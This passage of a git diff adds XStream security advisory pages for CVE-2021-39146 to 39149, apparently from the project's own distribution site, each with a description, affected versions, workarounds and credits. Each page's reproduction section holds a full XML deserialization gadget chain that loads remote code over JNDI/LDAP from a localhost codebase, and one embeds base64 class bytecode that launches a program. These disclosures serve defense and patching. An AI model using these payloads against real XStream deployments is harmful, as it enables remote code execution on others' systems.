+ </homeCtx>
+ <hasMoreCalled>true</hasMoreCalled>
+ <more>true</more>
+ <posn>0</posn>
+ <limit>1</limit>
+ <entries>
+ <com.sun.jndi.ldap.LdapEntry>
+ <DN>uid=songtao.xu,ou=oa,dc=example,dc=com</DN>
+ <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>
+ <javax.naming.directory.BasicAttribute>
+ <default>
+ <ignoreCase>false</ignoreCase>
+ </default>
+ <int>4</int>
+ <javax.naming.directory.BasicAttribute serialization='custom'>
+ <javax.naming.directory.BasicAttribute>
+ <default>
+ <ordered>false</ordered>
+ <attrID>objectClass</attrID>
+ </default>
+ <int>1</int>
+ <string>javanamingreference</string>
+ </javax.naming.directory.BasicAttribute>
+ </javax.naming.directory.BasicAttribute>
+ <javax.naming.directory.BasicAttribute serialization='custom'>
+ <javax.naming.directory.BasicAttribute>
+ <default>
+ <ordered>false</ordered>
+ <attrID>javaCodeBase</attrID>
+ </default>
+ <int>1</int>
+ <string>http://127.0.0.1:2333/</string>
+ </javax.naming.directory.BasicAttribute>
+ </javax.naming.directory.BasicAttribute>
+ <javax.naming.directory.BasicAttribute serialization='custom'>
+ <javax.naming.directory.BasicAttribute>
+ <default>
+ <ordered>false</ordered>
+ <attrID>javaClassName</attrID>
+ </default>
+ <int>1</int>
+ <string>refClassName</string>
+ </javax.naming.directory.BasicAttribute>
+ </javax.naming.directory.BasicAttribute>
+ <javax.naming.directory.BasicAttribute serialization='custom'>
+ <javax.naming.directory.BasicAttribute>
+ <default>
+ <ordered>false</ordered>
+ <attrID>javaFactory</attrID>
+ </default>
+ <int>1</int>
+ <string>Evil</string>
+ </javax.naming.directory.BasicAttribute>
+ </javax.naming.directory.BasicAttribute>
+ </javax.naming.directory.BasicAttribute>
+ </attributes>
+ </com.sun.jndi.ldap.LdapEntry>
+ </entries>
+ </aliases>
+ </it>
+ </mm>
+ </multiPart>
+ </sm>
+ </message>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>æŽå®‰è¯º (Li4n0) from Alibaba Cloud Security Team and Smi1e of DBAPPSecurity WEBIN Lab found and reported the issue
+ independently to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39146.html b/xstream-distribution/src/content/CVE-2021-39146.html
new file mode 100644
index 0000000000000000000000000000000000000000..cc5a9712bfa76de88a13f9df52a269150569dcf7
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39146.html
@@ -0,0 +1,119 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 26. May 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39146</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39146: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security framework
+ </a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple TreeSet and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><sorted-set>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>test</type>
+ <value class='javax.swing.MultiUIDefaults' serialization='custom'>
+ <unserializable-parents/>
+ <hashtable>
+ <default>
+ <loadFactor>0.75</loadFactor>
+ <threshold>525</threshold>
+ </default>
+ <int>700</int>
+ <int>0</int>
+ </hashtable>
+ <javax.swing.UIDefaults>
+ <default>
+ <defaultLocale>zh_CN</defaultLocale>
+ <resourceCache/>
+ </default>
+ </javax.swing.UIDefaults>
+ <javax.swing.MultiUIDefaults>
+ <default>
+ <tables>
+ <javax.swing.UIDefaults serialization='custom'>
+ <unserializable-parents/>
+ <hashtable>
+ <default>
+ <loadFactor>0.75</loadFactor>
+ <threshold>525</threshold>
+ </default>
+ <int>700</int>
+ <int>1</int>
+ <string>lazyValue</string>
+ <javax.swing.UIDefaults_-ProxyLazyValue>
+ <className>javax.naming.InitialContext</className>
+ <methodName>doLookup</methodName>
+ <args>
+ <string>ldap://127.0.0.1:1389/#evil</string>
+ </args>
+ </javax.swing.UIDefaults_-ProxyLazyValue>
+ </hashtable>
+ <javax.swing.UIDefaults>
+ <default>
+ <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>
+ <resourceCache/>
+ </default>
+ </javax.swing.UIDefaults>
+ </javax.swing.UIDefaults>
+ </tables>
+ </default>
+ </javax.swing.MultiUIDefaults>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>test</type>
+ <value class='com.sun.org.apache.xpath.internal.objects.XString'>
+ <m__obj class='string'>test</m__obj>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+</sorted-set>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>Ceclin and YXXX, White Hat Hacker from Tencent Security Response Center found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39147.html b/xstream-distribution/src/content/CVE-2021-39147.html
new file mode 100644
index 0000000000000000000000000000000000000000..5973d0252c443634df457f4c30fd9c5c4c4082a2
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39147.html
@@ -0,0 +1,244 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 28. May 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39147</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39147: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security framework
+ </a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple TreeSet and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><sorted-set>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>ysomap</type>
+ <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
+ <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
+ <parsedMessage>true</parsedMessage>
+ <soapVersion>SOAP_11</soapVersion>
+ <bodyParts/>
+ <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
+ <attachmentsInitialized>false</attachmentsInitialized>
+ <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
+ <soapPart/>
+ <mm>
+ <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
+ <aliases class='com.sun.jndi.ldap.LdapSearchEnumeration'>
+ <listArg class='javax.naming.CompoundName' serialization='custom'>
+ <javax.naming.CompoundName>
+ <properties/>
+ <int>1</int>
+ <string>ysomap</string>
+ </javax.naming.CompoundName>
+ </listArg>
+ <cleaned>false</cleaned>
+ <res>
+ <msgId>0</msgId>
+ <status>0</status>
+ </res>
+ <enumClnt>
+ <isLdapv3>false</isLdapv3>
+ <referenceCount>0</referenceCount>
+ <pooled>false</pooled>
+ <authenticateCalled>false</authenticateCalled>
+ </enumClnt>
+ <limit>1</limit>
+ <posn>0</posn>
+ <homeCtx>
+ <__contextType>0</__contextType>
+ <port__number>1099</port__number>
+ <hostname>127.0.0.1</hostname>
+ <clnt reference='../../enumClnt'/>
+ <handleReferrals>0</handleReferrals>
+ <hasLdapsScheme>true</hasLdapsScheme>
+ <netscapeSchemaBug>false</netscapeSchemaBug>
+ <referralHopLimit>0</referralHopLimit>
+ <batchSize>0</batchSize>
+ <deleteRDN>false</deleteRDN>
+ <typesOnly>false</typesOnly>
+ <derefAliases>0</derefAliases>
+ <addrEncodingSeparator/>
+ <connectTimeout>0</connectTimeout>
+ <readTimeout>0</readTimeout>
+ <waitForReply>false</waitForReply>
+ <replyQueueSize>0</replyQueueSize>
+ <useSsl>false</useSsl>
+ <useDefaultPortNumber>false</useDefaultPortNumber>
+ <parentIsLdapCtx>false</parentIsLdapCtx>
+ <hopCount>0</hopCount>
+ <unsolicited>false</unsolicited>
+ <sharable>false</sharable>
+ <enumCount>1</enumCount>
+ <closeRequested>false</closeRequested>
+ </homeCtx>
+ <more>true</more>
+ <hasMoreCalled>true</hasMoreCalled>
+ <startName class='javax.naming.ldap.LdapName' serialization='custom'>
+ <javax.naming.ldap.LdapName>
+ <default/>
+ <string>uid=ysomap,ou=oa,dc=example,dc=com</string>
+ </javax.naming.ldap.LdapName>
+ </startName>
+ <searchArgs>
+ <name class='javax.naming.CompoundName' reference='../../listArg'/>
+ <filter>ysomap</filter>
+ <cons>
+ <searchScope>1</searchScope>
+ <timeLimit>0</timeLimit>
+ <derefLink>false</derefLink>
+ <returnObj>true</returnObj>
+ <countLimit>0</countLimit>
+ </cons>
+ <reqAttrs/>
+ </searchArgs>
+ <entries>
+ <com.sun.jndi.ldap.LdapEntry>
+ <DN>uid=songtao.xu,ou=oa,dc=example,dc=com</DN>
+ <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>
+ <default>
+ <ignoreCase>false</ignoreCase>
+ </default>
+ <int>4</int>
+ <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
+ <javax.naming.directory.BasicAttribute>
+ <default>
+ <ordered>false</ordered>
+ <attrID>objectClass</attrID>
+ </default>
+ <int>1</int>
+ <string>javaNamingReference</string>
+ </javax.naming.directory.BasicAttribute>
+ <com.sun.jndi.ldap.LdapAttribute>
+ <default>
+ <rdn class=''javax.naming.CompositeName'' serialization=''custom''>
+ <javax.naming.CompositeName>
+ <int>0</int>
+ </javax.naming.CompositeName>
+ </rdn>
+ </default>
+ </com.sun.jndi.ldap.LdapAttribute>
+ </com.sun.jndi.ldap.LdapAttribute>
+ <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
+ <javax.naming.directory.BasicAttribute>
+ <default>
+ <ordered>false</ordered>
+ <attrID>javaCodeBase</attrID>
+ </default>
+ <int>1</int>
+ <string>http://127.0.0.1/</string>
+ </javax.naming.directory.BasicAttribute>
+ <com.sun.jndi.ldap.LdapAttribute>
+ <default>
+ <rdn class=''javax.naming.CompositeName'' serialization=''custom''>
+ <javax.naming.CompositeName>
+ <int>0</int>
+ </javax.naming.CompositeName>
+ </rdn>
+ </default>
+ </com.sun.jndi.ldap.LdapAttribute>
+ </com.sun.jndi.ldap.LdapAttribute>
+ <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
+ <javax.naming.directory.BasicAttribute>
+ <default>
+ <ordered>false</ordered>
+ <attrID>javaClassName</attrID>
+ </default>
+ <int>1</int>
+ <string>foo</string>
+ </javax.naming.directory.BasicAttribute>
+ <com.sun.jndi.ldap.LdapAttribute>
+ <default>
+ <rdn class=''javax.naming.CompositeName'' serialization=''custom''>
+ <javax.naming.CompositeName>
+ <int>0</int>
+ </javax.naming.CompositeName>
+ </rdn>
+ </default>
+ </com.sun.jndi.ldap.LdapAttribute>
+ </com.sun.jndi.ldap.LdapAttribute>
+ <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
+ <javax.naming.directory.BasicAttribute>
+ <default>
+ <ordered>false</ordered>
+ <attrID>javaFactory</attrID>
+ </default>
+ <int>1</int>
+ <string>EvilObj</string>
+ </javax.naming.directory.BasicAttribute>
+ <com.sun.jndi.ldap.LdapAttribute>
+ <default>
+ <rdn class=''javax.naming.CompositeName'' serialization=''custom''>
+ <javax.naming.CompositeName>
+ <int>0</int>
+ </javax.naming.CompositeName>
+ </rdn>
+ </default>
+ </com.sun.jndi.ldap.LdapAttribute>
+ </com.sun.jndi.ldap.LdapAttribute>
+ </attributes>
+ </com.sun.jndi.ldap.LdapEntry>
+ </entries>
+ </aliases>
+ </it>
+ </mm>
+ </multiPart>
+ </sm>
+ </message>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>ysomap</type>
+ <value class='com.sun.org.apache.xpath.internal.objects.XString'>
+ <m__obj class='string'>test</m__obj>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+</sorted-set>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>wh1t3p1g G5-RD6@IIE found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39148.html b/xstream-distribution/src/content/CVE-2021-39148.html
new file mode 100644
index 0000000000000000000000000000000000000000..090fa17b7d216717234adae4810e15273d7ffa8e
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39148.html
@@ -0,0 +1,134 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 28. May 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39148</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39148: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security framework
+ </a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple TreeSet and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><sorted-set>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>ysomap</type>
+ <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
+ <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
+ <parsedMessage>true</parsedMessage>
+ <soapVersion>SOAP_11</soapVersion>
+ <bodyParts/>
+ <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
+ <attachmentsInitialized>false</attachmentsInitialized>
+ <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
+ <soapPart/>
+ <mm>
+ <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
+ <aliases class='com.sun.jndi.toolkit.dir.ContextEnumerator'>
+ <children class='javax.naming.directory.BasicAttribute$ValuesEnumImpl'>
+ <list class='com.sun.xml.internal.dtdparser.SimpleHashtable'>
+ <current>
+ <hash>1</hash>
+ <key class='javax.naming.Binding'>
+ <name>ysomap</name>
+ <isRel>false</isRel>
+ <boundObj class='com.sun.jndi.ldap.LdapReferralContext'>
+ <refCtx class='javax.naming.spi.ContinuationDirContext'>
+ <cpe>
+ <stackTrace/>
+ <suppressedExceptions class='java.util.Collections$UnmodifiableRandomAccessList' resolves-to='java.util.Collections$UnmodifiableList'>
+ <c class='list'/>
+ <list reference='../c'/>
+ </suppressedExceptions>
+ <resolvedObj class='javax.naming.Reference'>
+ <className>EvilObj</className>
+ <addrs/>
+ <classFactory>EvilObj</classFactory>
+ <classFactoryLocation>http://127.0.0.1:1099/</classFactoryLocation>
+ </resolvedObj>
+ <altName class='javax.naming.CompoundName' serialization='custom'>
+ <javax.naming.CompoundName>
+ <properties/>
+ <int>1</int>
+ <string>ysomap</string>
+ </javax.naming.CompoundName>
+ </altName>
+ </cpe>
+ </refCtx>
+ <skipThisReferral>false</skipThisReferral>
+ <hopCount>0</hopCount>
+ </boundObj>
+ </key>
+ </current>
+ <currentBucket>0</currentBucket>
+ <count>0</count>
+ <threshold>0</threshold>
+ </list>
+ </children>
+ <currentReturned>true</currentReturned>
+ <currentChildExpanded>false</currentChildExpanded>
+ <rootProcessed>true</rootProcessed>
+ <scope>2</scope>
+ </aliases>
+ </it>
+ </mm>
+ </multiPart>
+ </sm>
+ </message>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>ysomap</type>
+ <value class='com.sun.org.apache.xpath.internal.objects.XString'>
+ <m__obj class='string'>test</m__obj>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+</sorted-set>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>wh1t3p1g G5-RD6@IIE found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39149.html b/xstream-distribution/src/content/CVE-2021-39149.html
new file mode 100644
index 0000000000000000000000000000000000000000..31a7b2b75fafa47399b41c467f816b7a85250bc3
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39149.html
@@ -0,0 +1,102 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 26. June 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39149</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39149: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple LinkedHashSet and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><linked-hash-set>
+ <dynamic-proxy>
+ <interface>map</interface>
+ <handler class='com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl'>
+ <classToInvocationHandler class='linked-hash-map'/>
+ <defaultHandler class='sun.tracing.NullProvider'>
+ <active>true</active>
+ <providerType>java.lang.Object</providerType>
+ <probes>
+ <entry>
+ <method>
+ <class>java.lang.Object</class>
+ <name>hashCode</name>
+ <parameter-types/>
+ </method>
+ <sun.tracing.dtrace.DTraceProbe>
+ <proxy class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'/>
+ <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
+ <default>
+ <__name>Pwnr</__name>
+ <__bytecodes>
+ <byte-array>yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEACGNhbGMuZXhlCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAbeXNvc2VyaWFsL1B3bmVyNjMzNTA1NjA2NTkzAQAdTHlzb3NlcmlhbC9Qd25lcjYzMzUwNTYwNjU5MzsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAk=</byte-array>
+ <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>
+ </__bytecodes>
+ <__transletIndex>-1</__transletIndex>
+ <__indentNumber>0</__indentNumber>
+ </default>
+ </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
+ </proxy>
+ <implementing__method>
+ <class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>
+ <name>getOutputProperties</name>
+ <parameter-types/>
+ </implementing__method>
+ </sun.tracing.dtrace.DTraceProbe>
+ </entry>
+ </probes>
+ </defaultHandler>
+ </handler>
+ </dynamic-proxy>
+</linked-hash-set>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the code from the payload gets executed on the host.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>Lai Han of NSFOCUS security team found and reported the issue to XStream and provided the required information
+ to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39150.html b/xstream-distribution/src/content/CVE-2021-39150.html
new file mode 100644
index 0000000000000000000000000000000000000000..5647936846a8c8315a19be52df0dd235587e05c8
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39150.html
@@ -0,0 +1,235 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 5. July 2021 by Joerg Schaible
+ -->
+ <head>
